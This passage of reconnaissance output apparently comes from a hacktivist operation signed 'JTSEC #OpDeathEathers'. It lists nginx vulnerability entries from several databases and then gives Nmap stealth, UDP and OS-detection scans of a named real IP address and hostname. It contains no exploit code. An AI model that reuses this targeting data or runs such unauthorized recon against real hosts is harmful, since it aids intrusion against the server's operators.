4942| [103517] nginx up to 1.13.2 Range Filter Request Integer Overflow memory corruption
4943| [87719] nginx up to 1.11.0 ngx_files.c ngx_chain_to_iovec denial of service
4944| [65364] nginx up to 1.1.13 Default Configuration information disclosure
4945| [5293] nginx up to 1.1.18 ngx_http_mp4_module MP4 File memory corruption
4946| [131858] Puppet Discovery up to 1.3.x Nginx Container weak authentication
4947| [130644] Nginx Unit up to 1.7.0 Router Process Request Heap-based memory corruption
4948| [67677] nginx up to 1.7.3 SSL weak authentication
4949| [67296] nginx up to 1.7.3 SMTP Proxy ngx_mail_smtp_starttls privilege escalation
4950| [12822] nginx up to 1.5.11 SPDY SPDY Request Heap-based memory corruption
4951| [12824] nginx 1.5.10 on 32-bit SPDY memory corruption
4952| [11237] nginx up to 1.5.6 URI String Bypass privilege escalation
4953| [8671] nginx up to 1.4 proxy_pass denial of service
4954| [8618] nginx 1.3.9/1.4.0 http/ngx_http_parse.c ngx_http_parse_chunked() memory corruption
4955| [7247] nginx 1.2.6 Proxy Function spoofing
4956| [61434] nginx 1.2.0/1.3.0 on Windows Access Restriction privilege escalation
4957| [4843] nginx up to 1.0.13/1.1.16 HTTP Header Response Parser ngx_http_parse.c information disclosure
4958|
4959| MITRE CVE - https://cve.mitre.org:
4960| [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028.
4961| [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file.
4962| [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request.
4963| [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow.
4964| [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request.
4965| [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response.
4966|
4967| SecurityFocus - https://www.securityfocus.com/bid/:
4968| [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability
4969| [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability
4970| [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability
4971| [90967] nginx CVE-2016-4450 Denial of Service Vulnerability
4972| [82230] nginx Multiple Denial of Service Vulnerabilities
4973| [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability
4974| [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability
4975| [69111] nginx SMTP Proxy Remote Command Injection Vulnerability
4976| [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability
4977| [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability
4978| [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability
4979| [59824] Nginx CVE-2013-2070 Remote Security Vulnerability
4980| [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability
4981| [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability
4982| [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability
4983| [58105] Nginx 'access.log' Insecure File Permissions Vulnerability
4984| [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability
4985| [55920] nginx CVE-2011-4963 Security Bypass Vulnerability
4986| [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability
4987| [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
4988| [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
4989| [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
4990| [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
4991| [40434] nginx Space String Remote Source Code Disclosure Vulnerability
4992| [40420] nginx Directory Traversal Vulnerability
4993| [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
4994| [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
4995| [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities
4996| [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability
4997| [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability
4998|
4999| IBM X-Force - https://exchange.xforce.ibmcloud.com:
5000| [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions
5001| [84172] nginx denial of service
5002| [84048] nginx buffer overflow
5003| [83923] nginx ngx_http_close_connection() integer overflow
5004| [83688] nginx null byte code execution
5005| [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass
5006| [82319] nginx access.log information disclosure
5007| [80952] nginx SSL spoofing
5008| [77244] nginx and Microsoft Windows request security bypass
5009| [76778] Naxsi module for Nginx nx_extract.py directory traversal
5010| [74831] nginx ngx_http_mp4_module.c buffer overflow
5011| [74191] nginx ngx_cpystrn() information disclosure
5012| [74045] nginx header response information disclosure
5013| [71355] nginx ngx_resolver_copy() buffer overflow
5014| [59370] nginx characters denial of service
5015| [59369] nginx DATA source code disclosure
5016| [59047] nginx space source code disclosure
5017| [58966] nginx unspecified directory traversal
5018| [54025] nginx ngx_http_parse.c denial of service
5019| [53431] nginx WebDAV component directory traversal
5020| [53328] Nginx CRC-32 cached domain name spoofing
5021| [53250] Nginx ngx_http_parse_complex_uri() function code execution
5022|
5023| Exploit-DB - https://www.exploit-db.com:
5024| [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
5025| [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow
5026| [25499] nginx 1.3.9-1.4.0 DoS PoC
5027|
5028| OpenVAS (Nessus) - http://www.openvas.org:
5029| [66451] Fedora Core 11 FEDORA-2009-12782 (nginx)
5030| [66450] Fedora Core 10 FEDORA-2009-12775 (nginx)
5031| [66449] Fedora Core 12 FEDORA-2009-12750 (nginx)
5032| [64912] Fedora Core 10 FEDORA-2009-9652 (nginx)
5033| [64911] Fedora Core 11 FEDORA-2009-9630 (nginx)
5034| [64869] Debian Security Advisory DSA 1884-1 (nginx)
5035|
5036| SecurityTracker - https://www.securitytracker.com:
5037| [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information
5038| [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code
5039| [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code
5040| [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents
5041|
5042| OSVDB - http://www.osvdb.org:
5043| [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access
5044| [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure
5045| [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow
5046| [92796] nginx ngx_http_close_connection Function Crafted r->
5047| [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution
5048| [90518] nginx Log Directory Permission Weakness Local Information Disclosure
5049| [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness
5050| [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access
5051| [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access
5052| [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow
5053| [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure
5054| [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow
5055| [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access
5056| [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS
5057| [65294] nginx on Windows Encoded Space Request Remote Source Disclosure
5058| [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass
5059| [62617] nginx Internal DNS Cache Poisoning Weakness
5060| [61779] nginx HTTP Request Escape Sequence Terminal Command Injection
5061| [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS
5062| [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write
5063| [58128] nginx ngx_http_parse_complex_uri() Function Underflow
5064| [44447] nginx (engine x) msie_refresh Directive Unspecified XSS
5065| [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass
5066| [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass
5067| [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal
5068| [44443] nginx (engine x) rtsig Method Signal Queue Overflow
5069| [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
5070|_
5071135/tcp filtered msrpc
5072139/tcp filtered netbios-ssn
5073445/tcp filtered microsoft-ds
5074#######################################################################################################################
5075Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 18:14 EDT
5076NSE: Loaded 151 scripts for scanning.
5077NSE: Script Pre-scanning.
5078Initiating NSE at 18:14
5079Completed NSE at 18:14, 0.00s elapsed
5080Initiating NSE at 18:14
5081Completed NSE at 18:14, 0.00s elapsed
5082Initiating NSE at 18:14
5083Completed NSE at 18:14, 0.00s elapsed
5084Initiating Ping Scan at 18:14
5085Scanning 213.183.63.253 [4 ports]
5086Completed Ping Scan at 18:14, 0.17s elapsed (1 total hosts)
5087Initiating Parallel DNS resolution of 1 host. at 18:14
5088Completed Parallel DNS resolution of 1 host. at 18:14, 0.02s elapsed
5089Initiating SYN Stealth Scan at 18:14
5090Scanning vm201114.melbi.space (213.183.63.253) [1000 ports]
5091Discovered open port 22/tcp on 213.183.63.253
5092Discovered open port 80/tcp on 213.183.63.253
5093Completed SYN Stealth Scan at 18:14, 5.65s elapsed (1000 total ports)
5094Initiating Service scan at 18:14
5095Scanning 2 services on vm201114.melbi.space (213.183.63.253)
5096Completed Service scan at 18:14, 6.35s elapsed (2 services on 1 host)
5097Initiating OS detection (try #1) against vm201114.melbi.space (213.183.63.253)
5098Retrying OS detection (try #2) against vm201114.melbi.space (213.183.63.253)
5099Initiating Traceroute at 18:14
5100Completed Traceroute at 18:14, 0.62s elapsed
5101Initiating Parallel DNS resolution of 8 hosts. at 18:14
5102Completed Parallel DNS resolution of 8 hosts. at 18:14, 5.80s elapsed
5103NSE: Script scanning 213.183.63.253.
5104Initiating NSE at 18:14
5105Completed NSE at 18:14, 4.41s elapsed
5106Initiating NSE at 18:14
5107Completed NSE at 18:14, 0.76s elapsed
5108Initiating NSE at 18:14
5109Completed NSE at 18:14, 0.00s elapsed
5110Nmap scan report for vm201114.melbi.space (213.183.63.253)
5111Host is up (0.14s latency).
5112Not shown: 995 closed ports
5113PORT STATE SERVICE VERSION
511422/tcp open ssh OpenSSH 7.4 (protocol 2.0)
5115| ssh-hostkey:
5116| 2048 da:20:da:dc:dc:03:2f:f4:fb:d3:39:f7:37:7b:e6:80 (RSA)
5117| 256 a3:35:91:92:60:07:1b:af:a5:b6:e5:46:a0:59:bc:c0 (ECDSA)
5118|_ 256 15:41:a5:a8:39:b9:62:a4:b9:93:28:ff:67:5f:b8:32 (ED25519)
511980/tcp open http nginx 1.16.1
5120| http-methods:
5121|_ Supported Methods: OPTIONS HEAD GET POST
5122|_http-server-header: nginx/1.16.1
5123|_http-title: Shared IP
5124135/tcp filtered msrpc
5125139/tcp filtered netbios-ssn
5126445/tcp filtered microsoft-ds
5127Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.2 - 4.9 (93%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 4.10 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Asus RT-AC66U WAP (92%), Linux 3.10 (92%), Linux 3.11 - 3.12 (92%)
5128No exact OS matches for host (test conditions non-ideal).
5129Uptime guess: 26.998 days (since Wed Mar 4 17:18:31 2020)
5130Network Distance: 8 hops
5131TCP Sequence Prediction: Difficulty=261 (Good luck!)
5132IP ID Sequence Generation: All zeros
5133
5134TRACEROUTE (using port 53/tcp)
5135HOP RTT ADDRESS
51361 104.57 ms 10.203.14.1
51372 613.83 ms 45.131.5.2
51383 104.77 ms 109.236.95.226
51394 105.44 ms 109.236.95.167
51405 101.46 ms 195.22.213.126
51416 155.23 ms ae10.sofia1.sof.seabone.net (195.22.211.209)
51427 132.21 ms melbikomas.sofia1.sof.seabone.net (89.221.39.27)
51438 146.70 ms vm201114.melbi.space (213.183.63.253)
5144
5145NSE: Script Post-scanning.
5146Initiating NSE at 18:14
5147Completed NSE at 18:14, 0.00s elapsed
5148Initiating NSE at 18:14
5149Completed NSE at 18:14, 0.00s elapsed
5150Initiating NSE at 18:14
5151Completed NSE at 18:14, 0.00s elapsed
5152#######################################################################################################################
5153Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 18:16 EDT
5154Nmap scan report for vm201114.melbi.space (213.183.63.253)
5155Host is up (0.15s latency).
5156Not shown: 95 closed ports
5157PORT STATE SERVICE
515822/tcp open ssh
515980/tcp open http
5160135/tcp filtered msrpc
5161139/tcp filtered netbios-ssn
5162445/tcp filtered microsoft-ds
5163#######################################################################################################################
5164Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 18:17 EDT
5165NSE: Loaded 151 scripts for scanning.
5166NSE: Script Pre-scanning.
5167Initiating NSE at 18:17
5168Completed NSE at 18:17, 0.00s elapsed
5169Initiating NSE at 18:17
5170Completed NSE at 18:17, 0.00s elapsed
5171Initiating NSE at 18:17
5172Completed NSE at 18:17, 0.00s elapsed
5173Initiating Ping Scan at 18:17
5174Scanning 213.183.63.253 [4 ports]
5175Completed Ping Scan at 18:17, 0.17s elapsed (1 total hosts)
5176Initiating Parallel DNS resolution of 1 host. at 18:17
5177Completed Parallel DNS resolution of 1 host. at 18:17, 0.02s elapsed
5178Initiating SYN Stealth Scan at 18:17
5179Scanning vm201114.melbi.space (213.183.63.253) [1000 ports]
5180Discovered open port 22/tcp on 213.183.63.253
5181Discovered open port 80/tcp on 213.183.63.253
5182Completed SYN Stealth Scan at 18:17, 3.11s elapsed (1000 total ports)
5183Initiating UDP Scan at 18:17
5184Scanning vm201114.melbi.space (213.183.63.253) [1000 ports]
5185Increasing send delay for 213.183.63.253 from 0 to 50 due to max_successful_tryno increase to 5
5186Increasing send delay for 213.183.63.253 from 50 to 100 due to 11 out of 13 dropped probes since last increase.
5187Increasing send delay for 213.183.63.253 from 100 to 200 due to 11 out of 11 dropped probes since last increase.
5188UDP Scan Timing: About 7.61% done; ETC: 18:23 (0:06:16 remaining)
5189Increasing send delay for 213.183.63.253 from 200 to 400 due to 11 out of 11 dropped probes since last increase.
5190Increasing send delay for 213.183.63.253 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
5191UDP Scan Timing: About 11.19% done; ETC: 18:26 (0:08:04 remaining)
5192UDP Scan Timing: About 14.36% done; ETC: 18:27 (0:09:03 remaining)
5193UDP Scan Timing: About 17.09% done; ETC: 18:28 (0:09:47 remaining)
5194UDP Scan Timing: About 36.24% done; ETC: 18:31 (0:09:11 remaining)
5195UDP Scan Timing: About 42.74% done; ETC: 18:31 (0:08:28 remaining)
5196UDP Scan Timing: About 50.17% done; ETC: 18:32 (0:07:43 remaining)
5197UDP Scan Timing: About 55.74% done; ETC: 18:32 (0:06:55 remaining)
5198UDP Scan Timing: About 61.44% done; ETC: 18:33 (0:06:08 remaining)
5199UDP Scan Timing: About 66.89% done; ETC: 18:33 (0:05:17 remaining)
5200UDP Scan Timing: About 72.27% done; ETC: 18:33 (0:04:26 remaining)
5201UDP Scan Timing: About 77.43% done; ETC: 18:33 (0:03:37 remaining)
5202UDP Scan Timing: About 82.91% done; ETC: 18:33 (0:02:45 remaining)
5203UDP Scan Timing: About 88.20% done; ETC: 18:33 (0:01:55 remaining)
5204UDP Scan Timing: About 93.20% done; ETC: 18:33 (0:01:06 remaining)
5205Completed UDP Scan at 18:33, 1012.26s elapsed (1000 total ports)
5206Initiating Service scan at 18:33
5207Scanning 38 services on vm201114.melbi.space (213.183.63.253)
5208Service scan Timing: About 7.89% done; ETC: 18:42 (0:07:58 remaining)
5209Service scan Timing: About 13.16% done; ETC: 18:44 (0:09:08 remaining)
5210Completed Service scan at 18:36, 136.61s elapsed (38 services on 1 host)
5211Initiating OS detection (try #1) against vm201114.melbi.space (213.183.63.253)
5212Retrying OS detection (try #2) against vm201114.melbi.space (213.183.63.253)
5213Initiating Traceroute at 18:36
5214Completed Traceroute at 18:36, 0.65s elapsed
5215Initiating Parallel DNS resolution of 8 hosts. at 18:36
5216Completed Parallel DNS resolution of 8 hosts. at 18:36, 5.52s elapsed
5217NSE: Script scanning 213.183.63.253.
5218Initiating NSE at 18:36
5219Completed NSE at 18:39, 188.90s elapsed
5220Initiating NSE at 18:39
5221Completed NSE at 18:39, 2.18s elapsed
5222Initiating NSE at 18:39
5223Completed NSE at 18:39, 0.01s elapsed
5224Nmap scan report for vm201114.melbi.space (213.183.63.253)
5225Host is up (0.14s latency).
5226Not shown: 1959 closed ports
5227PORT STATE SERVICE VERSION
522822/tcp open ssh OpenSSH 7.4 (protocol 2.0)
5229| ssh-hostkey:
5230| 2048 da:20:da:dc:dc:03:2f:f4:fb:d3:39:f7:37:7b:e6:80 (RSA)
5231| 256 a3:35:91:92:60:07:1b:af:a5:b6:e5:46:a0:59:bc:c0 (ECDSA)
5232|_ 256 15:41:a5:a8:39:b9:62:a4:b9:93:28:ff:67:5f:b8:32 (ED25519)
523380/tcp open http nginx 1.16.1
5234| http-methods:
5235|_ Supported Methods: OPTIONS HEAD GET POST
5236|_http-server-header: nginx/1.16.1
5237|_http-title: Shared IP
5238135/tcp filtered msrpc
5239139/tcp filtered netbios-ssn
5240445/tcp filtered microsoft-ds
52412/udp open|filtered compressnet
524280/udp open|filtered http
5243111/udp open|filtered rpcbind
5244135/udp open|filtered msrpc
5245136/udp open|filtered profile
5246137/udp open|filtered netbios-ns
5247138/udp open|filtered netbios-dgm
5248139/udp open|filtered netbios-ssn
5249158/udp open|filtered pcmail-srv
5250445/udp open|filtered microsoft-ds
52511007/udp open|filtered unknown
52521035/udp open|filtered mxxrlogin
52531060/udp open|filtered polestar
52542049/udp open|filtered nfs
52553702/udp open|filtered ws-discovery
52565050/udp open|filtered mmcc
52576000/udp open|filtered X11
5258|_x11-access: ERROR: Script execution failed (use -d to debug)
525917494/udp open|filtered unknown
526017787/udp open|filtered unknown
526119181/udp open|filtered unknown
526219632/udp open|filtered unknown
526321111/udp open|filtered unknown
526421364/udp open|filtered unknown
526528840/udp open|filtered unknown
526631335/udp open|filtered Trinoo_Register
526731681/udp open|filtered unknown
526832768/udp open|filtered omad
526932769/udp open|filtered filenet-rpc
527033281/udp open|filtered unknown
527137783/udp open|filtered unknown
527242313/udp open|filtered unknown
527343370/udp open|filtered unknown
527445380/udp open|filtered unknown
527549207/udp open|filtered unknown
527653838/udp open|filtered unknown
527764080/udp open|filtered unknown
5278Aggressive OS guesses: Linux 3.10 - 4.11 (95%), Linux 3.2 - 4.9 (93%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 4.1 (92%), Linux 4.10 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Asus RT-AC66U WAP (92%), Linux 3.10 (92%)
5279No exact OS matches for host (test conditions non-ideal).
5280Uptime guess: 27.015 days (since Wed Mar 4 17:18:31 2020)
5281Network Distance: 8 hops
5282TCP Sequence Prediction: Difficulty=259 (Good luck!)
5283IP ID Sequence Generation: All zeros
5284
5285TRACEROUTE (using port 110/tcp)
5286HOP RTT ADDRESS
52871 104.44 ms 10.203.14.1
52882 642.09 ms 45.131.5.2
52893 104.49 ms 109.236.95.226
52904 106.44 ms 109.236.95.167
52915 106.47 ms 195.22.213.126
52926 159.79 ms ae11.sofia1.sof.seabone.net (195.22.211.211)
52937 139.87 ms melbikomas.sofia1.sof.seabone.net (89.221.39.27)
52948 132.76 ms vm201114.melbi.space (213.183.63.253)
5295
5296NSE: Script Post-scanning.
5297Initiating NSE at 18:39
5298Completed NSE at 18:39, 0.00s elapsed
5299Initiating NSE at 18:39
5300Completed NSE at 18:39, 0.00s elapsed
5301Initiating NSE at 18:39
5302Completed NSE at 18:39, 0.00s elapsed
5303######################################################################################################################################
5304 Anonymous JTSEC #OpDeathEathers Full Recon #44